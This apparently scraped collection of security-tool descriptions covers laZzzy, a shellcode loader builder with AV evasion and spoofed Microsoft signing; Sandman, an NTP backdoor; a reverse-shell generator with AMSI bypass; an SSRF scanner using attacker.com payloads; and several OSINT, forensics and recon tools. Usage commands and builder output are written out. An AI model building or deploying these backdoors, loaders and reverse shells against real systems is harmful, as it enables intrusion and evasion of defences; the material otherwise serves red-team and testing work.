    • Byte-by-byte in-memory decryption of payload
  • XOR-encrypted strings
  • PPID spoofing
  • Blocking of non-Microsoft-signed DLLs
  • (Optional) Cloning of PE icon and attributes
  • (Optional) Code signing with spoofed cert

How to Use

Requirements:

  • Windows machine w/ Visual Studio and the following components, which can be installed from Visual Studio Installer > Individual Components:

    • C++ Clang Compiler for Windows and C++ Clang-cl for build tools

    • ClickOnce Publishing

  • Python3 and the required modules:

    • python3 -m pip install -r requirements.txt

Options:

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -h

โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ€โฃ€โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ โฃคโฃคโฃคโฃคโ €โข€โฃผโ Ÿโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โข€โฃ€โฃ€โก€โ €โ €โ €โข€โฃ€โฃ€โฃ€โฃ€โฃ€โก€โ €โข€โฃผโกฟโ โ €โ ›โ ›โ ’โ ’โข€โฃ€โก€โ €โ €โ €โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฐโฃพโ Ÿโ ‹โ ™โขปโฃฟโ €โ €โ ›โ ›โข›โฃฟโฃฟโ โ €โฃ โฃฟโฃฏโฃคโฃคโ „โ €โ €โ €โ €โ ˆโขฟโฃทโก€โ €โฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฟโฃฏ โ €โ €โขธโฃฟโ €โ €โ €โฃ โฃฟโกŸโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโขฟโฃงโฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ ™โ ฟโฃทโฃฆโฃดโขฟโฃฟโ „โข€โฃพโฃฟโฃฟโฃถโฃถโฃถโ †โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˜โฃฟโกฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃผโกฟโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €by: CaptMeeloโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโ ‰โ โ €โ €โ €

usage: builder.py [-h] -s -p -m [-tp] [-sp] [-pp] [-b] [-d]

options:
-h, --help show this help message and exit
-s path to raw shellcode
-p password
-m shellcode execution method (e.g. 1)
-tp process to inject (e.g. svchost.exe)
-sp process to spawn (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-pp parent process to spoof (e.g. explorer.exe)
-b binary to spoof metadata (e.g. C:\\Windows\\System32\\RuntimeBroker.exe)
-d domain to spoof (e.g. www.microsoft.com)

shellcode execution method:
1 Early-bird APC Queue (requires sacrificial proces)
2 Thread Hijacking (requires sacrificial proces)
3 KernelCallbackTable (requires sacrificial process that has GUI)
4 Section View Mapping
5 Thread Suspension
6 LineDDA Callback
7 EnumSystemGeoID Callback
8 FLS Callback
9 SetTimer
10 Clipboard

Example:

Execute builder.py and supply the necessary data.

(venv) PS C:\MalDev\laZzzy> python3 .\builder.py -s .\calc.bin -p CaptMeelo -m 1 -pp explorer.exe -sp C:\\Windows\\System32\\notepad.exe -d www.microsoft.com -b C:\\Windows\\System32\\mmc.exe

โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ€โฃ€โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃ โฃคโฃคโฃคโฃคโ €โข€ โ Ÿโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ €โ €โข€โฃ€โฃ€โก€โ €โ €โ €โข€โฃ€โฃ€โฃ€โฃ€โฃ€โก€โ €โข€โฃผโกฟโ โ €โ ›โ ›โ ’โ ’โข€โฃ€โก€โ €โ €โ €โฃ€โก€โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฐโฃพโ Ÿโ ‹โ ™โขปโฃฟโ €โ €โ ›โ ›โข›โฃฟโฃฟโ โ €โฃ โฃฟโฃฏโฃคโฃคโ „โ €โ €โ €โ €โ ˆโขฟโฃทโก€โ €โฃฐโฃฟโ ƒ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โฃฟโฃฏโ €โ €โ €โขธโฃฟโ €โ €โ €โฃ โฃฟโกŸโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโขฟโฃงโฃฐโฃฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €โฃฟโฃฟโ €โ €โ ™โ ฟโฃทโฃฆโฃดโขฟโฃฟโ „โข€โฃพโฃฟโฃฟโฃถโฃถโฃถโ †โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˜โฃฟโกฟโ ƒโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ € โ €โ €โ €โ €
โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โฃผโกฟโ โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €
โ €โ €by: CaptMeeloโ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ €โ ˆโ ‰โ โ €โ €โ €

[+] XOR-encrypting payload with
[*] Key: d3b666606468293dfa21ce2ff25e86f6

[+] AES-encrypting payload with
[*] IV: f96312f17a1a9919c74b633c5f861fe5
[*] Key: 6c9656ed1bc50e1d5d4033479e742b4b8b2a9b2fc81fc081fc649e3fb4424fec

[+] Modifying template using
[*] Technique: Early-bird APC Queue
[*] Process to inject: None
[*] Process to spawn: C:\\Windows\\System32\\RuntimeBroker.exe
[*] Parent process to spoof: svchost.exe

[+] Spoofing metadata
[*] Binary: C:\\Windows\\System32\\RuntimeBroker.exe
[*] CompanyName: Microsoft Corporation
[*] FileDescription: Runtime Broker
[*] FileVersion: 10.0.22621.608 (WinBuild.160101.0800)
[*] InternalName: RuntimeBroker.exe
[*] LegalCopyright: ยฉ Microsoft Corporation. All rights reserved.
[*] OriginalFilename: RuntimeBroker.exe
[*] ProductName: Microsoftยฎ Windowsยฎ Operating System
[*] ProductVersion: 10.0.22621.608

[+] Compiling project
[*] Compiled executable: C:\MalDev\laZzzy\loader\x64\Release\laZzzy.exe

[+] Signing binary with spoofed cert
[*] Domain: www.microsoft.com
[*] Version: 2
[*] Serial: 33:00:59:f8:b6:da:86:89:70:6f:fa:1b:d9:00:00:00:59:f8:b6
[*] Subject: /C=US/ST=WA/L=Redmond/O=Microsoft Corporation/CN=www.microsoft.com
[*] Issuer: /C=US/O=Microsoft Corporation/CN=Microsoft Azure TLS Issuing CA 06
[*] Not Before: October 04 2022
[*] Not After: September 29 2023
[*] PFX file: C:\MalDev\laZzzy\output\www.microsoft.com.pfx

[+] All done!
[*] Output file: C:\MalDev\laZzzy\output\RuntimeBroker.exe

Libraries Used

Shellcode Execution Techniques

  1. Early-bird APC Queue (requires sacrificial process)
  2. Thread Hijacking (requires sacrificial process)
  3. KernelCallbackTable (requires sacrificial process that has a GUI)
  4. Section View Mapping
  5. Thread Suspension
  6. LineDDA Callback
  7. EnumSystemGeoID Callback
  8. Fiber Local Storage (FLS) Callback
  9. SetTimer
  10. Clipboard

Notes:

  • Only works on Windows x64
  • Debugging only works on Release mode
  • Sometimes, KernelCallbackTable doesn't work on the first run but will eventually work afterward

Credits/References



Octosuite - Advanced Github OSINT Framework


A framework fro gathering osint on GitHub users, repositories and organizations


Wiki

Refer to the Wiki for installation instructions, in addition to all other documentation.

Features

  • Fetches an organization's profile information
  • Fetches an oganization's events
  • Returns an organization's repositories
  • Returns an organization's public members
  • Fetches a repository's information
  • Returns a repository's contributors
  • Returns a repository's languages
  • Fetches a repository's stargazers
  • Fetches a repository's forks
  • Fetches a repository's releases
  • Returns a list of files in a specified path of a repository
  • Fetches a user's profile information
  • Returns a user's gists
  • Returns organizations that a user owns/belongs to
  • Fetches a user's events
  • Fetches a list of users followed by the target
  • Fetches a user's followers
  • Checks if user A follows user B
  • Checks if user is a public member of an organizations
  • Returns a user's subscriptions
  • Gets a user's subscriptions
  • Gets a user's events
  • Searches users
  • Searches repositories
  • Searches topics
  • Searches issues
  • Searches commits
  • Automatically logs network activity (.logs folder)
  • User can view, read and delete logs
  • ...And more

Note

Octosuite automatically logs network and user activity of each session, the logs are saved by date and time in the .logs folder



Pylirt - Python Linux Incident Response Toolkit


With this application, it is aimed to accelerate the incident response processes by collecting information in linux operating systems.


Features

Information is collected in the following contents.

/etc/passwd

cat /etc/group

cat /etc/sudoers

lastlog

cat /var/log/auth.log

uptime/proc/meminfo

ps aux

/etc/resolv.conf

/etc/hosts

iptables -L -v -n

find / -type f -size +512k -exec ls -lh {}/;

find / -mtime -1 -ls

ip a

netstat -nap

arp -a

echo $PATH

Installation

git clone https://github.com/anil-yelken/pylirt

cd pylirt

sudo pip3 install paramiko

Usage

The following information should be specified in the cred_list.txt file:

IP|Username|Password

sudo python3 plirt.py

Contact

https://twitter.com/anilyelken06

https://medium.com/@anilyelken



Shells - Little Script For Generating Revshells


A script for generating common revshells fast and easy.
Especially nice when in need of PowerShell and Python revshells, which can be a PITA getting correctly formated.

PowerShell revshells

  • Shows username@computer, above the prompt and working-directory
  • Has a partial AMSI-bypass, making some stuff a bit easier
  • TCP and UDP
  • Windows Powershell and Core Powershell
  • Functions for uploading and downloading files. (Using Updog by sc0tfree)

ngrok support

  • ngrok can be started/stopped from inside the script
  • payloads will be genereated with the ngrok addresses

Updog support

  • you can start/stop Updog from inside the script
  • The PowerShell revshells have upload/download function embedded
  • To upload from nix using curl: curl -F path="absolute path for Updog-folder" -F file=filename http://UpdogIP/upload

To install Shells

git clone https://github.com/4ndr34z/shells
cd shells
./install.sh

Screenshots

Youtube video


Version 1.4.6

  • Added webshells (ASPX, PHP, JSP)

Version 1.4.5

  • Added 2 c++ revshell binaries for Windows 32 and 64 bit.

Version 1.4.4

  • Fixed the handling of starting/stopping Updog

Version 1.4.3

  • Added Updog support
  • Added Netcat binaries.
  • Powershell: Created upload/download functionality (upload requires Updog for receiving files)
  • Added more information about running ngrok and Updog.

Version 1.4.2

  • PowerShell: Added a new "mini AMSI-bypass". (It is a partial bypass) Based on Matt Graebers Reflection method
  • PowerShell: Added a "upload" function in the Powershell reverseshell

Version 1.4.1

  • Removed AMSI. Not tested enough :-)

Version 1.4

  • Added AMSI-bypass for the powershell payloads

Version 1.3.9

  • Fixed bug when setting port
  • Changed default port to 443
  • PowerShell: obfuscated some more

Version 1.3.8

  • PowerShell: Minor changes to the UDP payload

Version 1.3.7

  • Using only native nc on macOS, because the one on homebrew doesn't work on incoming UDP
  • PowerShell: Added UDP payloads

Version 1.3.6

  • PowerShell: Added more payloads

Version 1.3.5

Version 1.3.4

  • PowerShell: Using UTF8 encoding in payload

Version 1.3.3

  • Added Golang

Version 1.3.2

  • Added OpenSSL

Version 1.3.1

  • Fixed bug in Python revshell
  • Added awk
  • Added Bash UDP

Version 1.3

  • Added Windows Python revshells

Version 1.2.9

  • Added a ngrok running-status

Version 1.2.8

  • Hiding ngrok choice if not installed

Version 1.2.7

  • Fixed the install options: not doing default option when pressing enter without making a choice

Version 1.2.6

  • Added support for ngrok.

Version 1.2.4

  • Added a install-script
  • Added install options for checking and installing missing dependencies

Version 1.2.3

  • Added a couple of PHP shells

Version 1.2.2

  • Added shells for: Ruby, Perl, Telnet and zsh

Version 1.2.1

  • Added copy to clipboard using pbcopy on macOS
  • Added info about listening netcat as the macOS versions doesn't display that

Version 1.2

  • Added looping netcat shells. Calls back every 10 seconds. Great in case you loose your shell
  • Added check for netcat GNU netcat 0.7.0 Homebrew when running on macOS

Version 1.1

  • Added support for macOS


Octopii - An AI-powered Personal Identifiable Information (PII) Scanner


Octopii is an open-source AI-powered Personal Identifiable Information (PII) scanner that can look for image assets such as Government IDs, passports, photos and signatures in a directory.


Working

Octopii uses Tesseract's Optical Character Recognition (OCR) and Keras' Convolutional Neural Networks (CNN) models to detect various forms of personal identifiable information that may be leaked on a publicly facing location. This is done in the following steps:

1. Importing and cleaning image(s)

The image is imported via OpenCV and Python Imaging Library (PIL) and is cleaned, deskewed and rotated for scanning.

2. Performing image classification and Optical Character Recognition (OCR)

A directory is looped over and searched for images. These images are scanned for unique features via the image classifier (done by comparing it to a trained model), along with OCR for finding substrings within the image. This may have one of the following outcomes:

  • Best case (score >=90): The image is sent into the image classifier algorithm to be scanned for features such as an ISO/IEC 7810 card specification, colors, location of text, photos, holograms etc. If it is successfully classified as a type of PII, OCR is performed on it looking for particular words and strings as a final check. When both of these are confirmed, the result from Octopii is extremely reliable.

  • Average case (score >=50): The image is partially/incorrectly identified by the image classifier algorithm, but an OCR check finds contradicting substrings and reclassifies it.

  • Worst case (score >=0): The image is only identified by the image classifier algorithm but an OCR scan returns no results.

  • Incorrect classification: False positives due to a very small model or OCR list may incorrectly classify PIIs, giving inaccurate results.

As a final verification method, images are scanned for certain strings to verify the accuracy of the model.

The accuracy of the scan can determined via the confidence scores in output. If all the mentioned conditions are met, a score of 100.0 is returned.

To train the model, data can also be fed into the model_generator.py script, and the newly improved h5 file can be used.

Usage

  1. Install all dependencies via pip install -r requirements.txt.
  2. Install the Tesseract helper locally via sudo apt install tesseract-ocr -y (for Ubuntu/Debian).
  3. To run Octopii, type python3 octopii.py <location name>, for example python3 octopii.py pii_list/
python3 octopii.py <location to scan> <additional flags>

Octopii currently supports local scanning and scanning S3 directories and open directory listings via their URLs.

Example

Contributing

Open-source projects like these thrive on community support. Since Octopii relies heavily on machine learning and optical character recognition, contributions are much appreciated. Here's how to contribute:

1. Fork

Fork the official repository at https://github.com/redhuntlabs/octopii

2. Understand

There are 3 files in the models/ directory. - The keras_models.h5 file is the Keras h5 model that can be obtained from Google's Teachable Machine or via Keras in Python. - The labels.txt file contains the list of labels corresponding to the index that the model returns. - The ocr_list.json file consists of keywords to search for during an OCR scan, as well as other miscellaneous information such as country of origin, regular expressions etc.

Generating models via Teachable Machine

Since our current dataset is quite small, we could benefit from a large Keras model of international PII for this project. If you do not have expertise in Keras, Google provides an extremely easy to use model generator called the Teachable Machine. To use it:

  • Visit https://teachablemachine.withgoogle.com/train and select 'Image Project' โ†’ 'Standard Image Model'.
  • A few classes are visible. Rename the class to an asset type ypu'd like to upload, such as "German Passport" or "California Driver License".
  • Add images by clicking the 'Upload' button and upload some image assets. Note: images have to be square

Tip: segregate your image assets into folders with the folder name being the same as the class name. You can then drag and drop a folder into the upload dialog.

  • Click '+ Add a class' at the bottom of the page to add more classes with data and repeat. You can make the classes more specific, such as "Goa Driver License Old Format".

Note: Only upload the same as the class name, for example, the German Passport class must have German Passport pictures. Uploading the wrong data to the wrong class will confuse the machine learning algorithms.

  • Verify the classes and images one last time. Once you're ready, click on the 'Train Model' button. You can increase the epoch size (such as 5000) to improve model accuracy.
  • To test, you can test the model by clicking the Input dropdown and selecting 'File', then uploading a sample image.
  • Once you're ready, click the 'Export Model' button. In the dialog that pops up, select the 'Tensorflow' tab (not Tensorflow.js) and select the 'Keras' radio button, then click 'Download my model' to export the newly generated model. Extract the downloaded zip file and paste the keras_model.h5 file and labels.txt file into the models/ directory in Octopii.

The images used for the model above are not visible to us since they're in a proprietary format. You can use both dummy and actual PII. Make sure they are square-ish in image size.

Updating OCR list

Once you generate models using Teachable Machine, you can improve Octopii's accuracy via OCR. To do this:

  • Open the existing ocr_list.json file. Create a JSONObject with the key having the same name as the asset class. NOTE: The key name must be exactly the same as the asset class name from Teachable Machine.
  • For the keywords, use as many unique terms from your asset as possible, such as "Income Tax Department". Store them in a JSONArray.
  • (Advanced) you can also add regexes for things like ID numbers and MRZ on passports if they are unique enough. Use https://regex101.com to test your regexes before adding them.
  • Save/overwrite the existing ocr_list.json file.

3. Edit

You can replace each file you modify in the models/ directory after you create or edit them via the above methods.

4. Pull request

Submit a pull request from your forked repo and we'll pick it up and replace our current model with it if the changes are large enough.

Note: Please take the following steps to ensure quality

  • Make sure the model returns extremely accurate results by testing it locally first.
  • Use proper text casing for label names in both the Keras model and ocr_list.json.
  • Make sure all JSON is valid with appropriate character escapes with no duplicate keys, regexes or keywords.
  • For country names, please use the ISO 3166-1 alpha-2 code of the country.

Credits

License

MIT License

(c) Copyright 2022 RedHunt Labs Private Limited

Author: Owais Shaikh



autoSSRF - Smart Context-Based SSRF Vulnerabiltiy Scanner


autoSSRF is your best ally for identifying SSRF vulnerabilities at scale. Different from other ssrf automation tools, this one comes with the two following original features :

  • Smart fuzzing on relevant SSRF GET parameters

    When fuzzing, autoSSRF only focuses on the common parameters related to SSRF (?url=, ?uri=, ..) and doesnโ€™t interfere with everything else. This ensures that the original URL is still correctly understood by the tested web-application, something that might doesnโ€™t happen with a tool which is blindly spraying query parameters.

  • Context-based dynamic payloads generation

    For the given URL : https://host.com/?fileURL=https://authorizedhost.com, autoSSRF would recognize authorizedhost.com as a potentially white-listed host for the web-application, and generate payloads dynamically based on that, attempting to bypass the white-listing validation. It would result to interesting payloads such as : http://authorizedhost.attacker.com, http://authorizedhost%252F@attacker.com, etc.

Furthermore, this tool guarantees almost no false-positives. The detection relies on the great ProjectDiscoveryโ€™s interactsh, allowing autoSSRF to confidently identify out-of-band DNS/HTTP interactions.


Usage

python3 autossrf.py -h

This displays help for the tool.

usage: autossrf.py [-h] [--file FILE] [--url URL] [--output] [--verbose]

options:
-h, --help show this help message and exit
--file FILE, -f FILE file of all URLs to be tested against SSRF
--url URL, -u URL url to be tested against SSRF
--output, -o output file path
--verbose, -v activate verbose mode

Single URL target:

python3 autossrf.py -u https://www.host.com/?param1=X&param2=Y&param2=Z

Multiple URLs target with verbose:

python3 autossrf.py -f urls.txt -v

Installation

1 - Clone

git clone https://github.com/Th0h0/autossrf.git

2 - Install requirements

Python libraries :

cd autossrf 
pip install -r requirements.txt

Interactsh-Client :

go install -v github.com/projectdiscovery/interactsh/cmd/interactsh-client@latest

License

autoSSRF is distributed underย MIT License.



Sandman - NTP Based Backdoor For Red Team Engagements In Hardened Networks


Sandman is a backdoor that is meant to work on hardened networks during red team engagements.

Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre-defined server.

Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.


Usage

SandmanServer (Usage)

Run on windows / *nix machine:

python3 sandman_server.py "Network Adapter" "Payload Url" "optional: ip to spoof"
  • Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).

  • Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.

  • IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com's IP address).

SandmanBackdoor (Usage)

To start, you can compile the SandmanBackdoor as mentioned below, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider or just execute/inject it.

SandmanBackdoorTimeProvider (Usage)

To use it, you will need to follow simple steps:

  • Add the following registry value:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient" /v DllName /t REG_SZ /d "C:\Path\To\TheDll.dll"
  • Restart the w32time service:
sc stop w32time
sc start w32time

NOTE: Make sure you are compiling with the x64 option and not any CPU option!

Capabilities

  • Getting and executing an arbitrary payload from an attacker's controlled server.

  • Can work on hardened networks since NTP is usually allowed in FW.

  • Impersonating a legitimate NTP server via IP spoofing.

Setup

SandmanServer (Setup)

SandmanBackdoor (Setup)

To compile the backdoor I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and CSC. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

SandmanBackdoorTimeProvider (Setup)

To compile the backdoor I used Visual Studio 2022, you will also need to install DllExport (via Nuget or any other way) to compile it. You can compile it either using the USE_SHELLCODE and use Orca's shellcode or without USE_SHELLCODE to use WebClient.

IOCs

  • A shellcode is injected into RuntimeBroker.

  • Suspicious NTP communication starts with a known magic header.

  • YARA rule.

Contributes

Thanks to those who already contributed and I'll happily accept contributions, make a pull request and I will review it!



xnLinkFinder - A Python Tool Used To Discover Endpoints (And Potential Parameters) For A Given Target

About - v2.0

This is a tool used to discover endpoints (and potential parameters) for a given target. It can find them by:

  • crawling a target (pass a domain/URL)
  • crawling multiple targets (pass a file of domains/URLs)
  • searching files in a given directory (pass a directory name)
  • get them from a Burp project (pass location of a Burp XML file)
  • get them from an OWASP ZAP project (pass location of a ZAP ASCII message file)

The python script is based on the link finding capabilities of my Burp extension GAP. As a starting point, I took the amazing tool LinkFinder by Gerben Javado, and used the Regex for finding links, but with additional improvements to find even more.


Installation

xnLinkFinder supports Python 3.

$ git clone https://github.com/xnl-h4ck3r/xnLinkFinder.git
$ cd xnLinkFinder
$ sudo python setup.py install

Usage

Arg Long Arg Description
-i --input Input a: URL, text file of URLs, a Directory of files to search, a Burp XML output file or an OWASP ZAP output file.
-o --output The file to save the Links output to, including path if necessary (default: output.txt). If set to cli then output is only written to STDOUT. If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-op --output-params The file to save the Potential Parameters output to, including path if necessary (default: parameters.txt). If set to cli then output is only written to STDOUT (but not piped to another program). If the file already exist it will just be appended to (and de-duplicated) unless option -ow is passed.
-ow --output-overwrite If the output file already exists, it will be overwritten instead of being appended to.
-sp --scope-prefix Any links found starting with / will be prefixed with scope domains in the output instead of the original link. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-spo --scope-prefix-original If argument -sp is passed, then this determines whether the original link starting with / is also included in the output (default: false)
-sf --scope-filter Will filter output links to only include them if the domain of the link is in the scope specified. If the passed value is a valid file name, that file will be used, otherwise the string literal will be used.
-c --cookies โ€  Add cookies to pass with HTTP requests. Pass in the format 'name1=value1; name2=value2;'
-H --headers โ€  Add custom headers to pass with HTTP requests. Pass in the format 'Header1: value1; Header2: value2;'
-ra --regex-after RegEx for filtering purposes against found endpoints before output (e.g. /api/v[0-9]\.[0-9]\* ). If it matches, the link is output.
-d --depth โ€  The level of depth to search. For example, if a value of 2 is passed, then all links initially found will then be searched for more links (default: 1). This option is ignored for Burp files because they can be huge and consume lots of memory. It is also advisable to use the -sp (--scope-prefix) argument to ensure a request to links found without a domain can be attempted.
-p --processes โ€  Basic multithreading is done when getting requests for a URL, or file of URLs (not a Burp file). This argument determines the number of processes (threads) used (default: 25)
-x --exclude Additional Link exclusions (to the list in config.yml) in a comma separated list, e.g. careers,forum
-orig --origin Whether you want the origin of the link to be in the output. Displayed as LINK-URL [ORIGIN-URL] in the output (default: false)
-t --timeout โ€  How many seconds to wait for the server to send data before giving up (default: 10 seconds)
-inc --include Include input (-i) links in the output (default: false)
-u --user-agent โ€  What User Agents to get links for, e.g. -u desktop mobile
-insecure โ€  Whether TLS certificate checks should be disabled when making requests (delfault: false)
-s429 โ€  Stop when > 95 percent of responses return 429 Too Many Requests (default: false)
-s403 โ€  Stop when > 95 percent of responses return 403 Forbidden (default: false)
-sTO โ€  Stop when > 95 percent of requests time out (default: false)
-sCE โ€  Stop when > 95 percent of requests have connection errors (default: false)
-m --memory-threshold The memory threshold percentage. If the machines memory goes above the threshold, the program will be stopped and ended gracefully before running out of memory (default: 95)
-mfs --max-file-size โ€  The maximum file size (in bytes) of a file to be checked if -i is a directory. If the file size os over, it will be ignored (default: 500 MB). Setting to 0 means no files will be ignored, regardless of size..
-replay-proxy โ€  For active link finding with URL (or file of URLs), replay the requests through this proxy.
-ascii-only Whether links and parameters will only be added if they only contain ASCII characters. This can be useful when you know the target is likely to use ASCII characters and you also get a number of false positives from binary files for some reason.
-v --verbose Verbose output
-vv --vverbose Increased verbose output
-h --help show the help message and exit

โ€  NOT RELEVANT FOR INPUT OF DIRECTORY, BURP XML FILE OR OWASP ZAP FILE

config.yml

The config.yml file has the keys which can be updated to suit your needs:

  • linkExclude - A comma separated list of strings (e.g. .css,.jpg,.jpeg etc.) that all links are checked against. If a link includes any of the strings then it will be excluded from the output. If the input is a directory, then file names are checked against this list.
  • contentExclude - A comma separated list of strings (e.g. text/css,image/jpeg,image/jpg etc.) that all responses Content-Type headers are checked against. Any responses with the these content types will be excluded and not checked for links.
  • fileExtExclude - A comma separated list of strings (e.g. .zip,.gz,.tar etc.) that all files in Directory mode are checked against. If a file has one of those extensions it will not be searched for links.
  • regexFiles - A list of file types separated by a pipe character (e.g. php|php3|php5 etc.). These are used in the Link Finding Regex when there are findings that aren't obvious links, but are interesting file types that you want to pick out. If you add to this list, ensure you escape any dots to ensure correct regex, e.g. js\.map
  • respParamLinksFound โ€  - Whether to get potential parameters from links found in responses: True or False
  • respParamPathWords โ€  - Whether to add path words in retrieved links as potential parameters: True or False
  • respParamJSON โ€  - If the MIME type of the response contains JSON, whether to add JSON Key values as potential parameters: True or False
  • respParamJSVars โ€  - Whether javascript variables set with var, let or const are added as potential parameters: True or False
  • respParamXML โ€  - If the MIME type of the response contains XML, whether to add XML attributes values as potential parameters: True or False
  • respParamInputField โ€  - If the MIME type of the response contains HTML, whether to add NAME and ID attributes of any INPUT fields as potential parameters: True or False
  • respParamMetaName โ€  - If the MIME type of the response contains HTML, whether to add NAME attributes of any META tags as potential parameters: True or False

โ€  IF THESE ARE NOT FOUND IN THE CONFIG FILE THEY WILL DEFAULT TO True

Examples

Find Links from a specific target - Basic

python3 xnLinkFinder.py -i target.com

Find Links from a specific target - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains (this can be a file or in scope domains). Also, you can pass cookies and customer headers to ensure you find links only available to authorised users. Specifying the User Agent (-u desktop mobile) will first search for all links using desktop User Agents, and then try again using mobile user agents. There could be specific endpoints that are related to the user agent given. Giving a depth value (-d) will keep sending request to links found on the previous depth search to find more links.

python3 xnLinkFinder.py -i target.com -sp target_prefix.txt -sf target_scope.txt -spo -inc -vv -H 'Authorization: Bearer XXXXXXXXXXXXXX' -c 'SessionId=MYSESSIONID' -u desktop mobile -d 10

Find Links from a list of URLs - Basic

If you have a file of JS file URLs for example, you can look for links in those:

python3 xnLinkFinder.py -i target_js.txt

Find Links from a files in a directory - Basic

If you have a files, e.g. JS files, HTTP responses, etc. you can look for links in those:

python3 xnLinkFinder.py -i ~/Tools/waymore/results/target.com

NOTE: Sub directories are also checked. The -mfs option can be specified to skip files over a certain size.

Find Links from a Burp project - Basic

In Burp, select the items you want to search by highlighting the scope for example, right clicking and selecting the Save selected items. Ensure that the option base64-encode requests and responses option is checked before saving. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_burp.xml

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i starts with <?xml then you are trying to process a Burp file.

Find Links from a Burp project - Detailed

Ideally, provide scope prefix (-sp) with the primary domain (including schema), and a scope filter (-sf) to filter the results only to relevant domains.

python3 xnLinkFinder.py -i target_burp.xml -o target_burp.txt -sp https://www.target.com -sf target.* -ow -spo -inc -vv

Find Links from an OWASP ZAP project - Basic

In ZAP, select the items you want to search by highlighting the History for example, clicking menu Report and selecting Export Messages to File.... This will let you save an ASCII text file of all requests and responses you want to search. To get all links from the file (even with HUGE files, you'll be able to get all the links):

python3 xnLinkFinder.py -i target_zap.txt

NOTE: xnLinkFinder makes the assumption that if the first line of the file passed with -i is in the format ==== 99 ========== for example, then you are trying to process an OWASP ZAP ASCII text file.

Piping to other Tools

You can pipe xnLinkFinder to other tools. Any errors are sent to stderr and any links found are sent to stdout. The output file is still created in addition to the links being piped to the next program. However, potential parameters are not piped to the next program, but they are still written to file. For example:

python3 xnLinkFinder.py -i redbull.com -sp https://redbull.com -sf rebbull.* -d 3 | unfurl keys | sort -u

You can also pass the input through stdin instead of -i.

cat redbull_subs.txt | python3 xnLinkFinder.py -sp https://redbull.com -sf rebbull.* -d 3

